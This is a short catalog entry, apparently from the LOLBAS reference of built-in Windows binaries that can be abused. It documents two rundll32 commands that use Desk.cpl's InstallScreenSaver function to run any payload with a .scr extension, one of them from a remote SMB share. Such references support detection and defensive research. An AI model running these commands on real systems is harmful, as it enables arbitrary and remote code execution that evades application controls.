Catalog LOLBAS

LOL · Library

Desk.cpl

2 techniques WindowsLOLBAS GPL-3.0

Execute

Execution Windows

Launch an executable with a .scr extension by calling the InstallScreenSaver function.

Use Launch any executable payload, as long as it uses the .scr extension.

rundll32.exe desk.cpl,InstallScreenSaver {PATH_ABSOLUTE:.scr}
Context
user
Native
Execute

Execute

Execution Windows

Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function.

Use Launch any executable payload, as long as it uses the .scr extension.

rundll32.exe desk.cpl,InstallScreenSaver {PATH_SMB:.scr}
Context
user
Native
Execute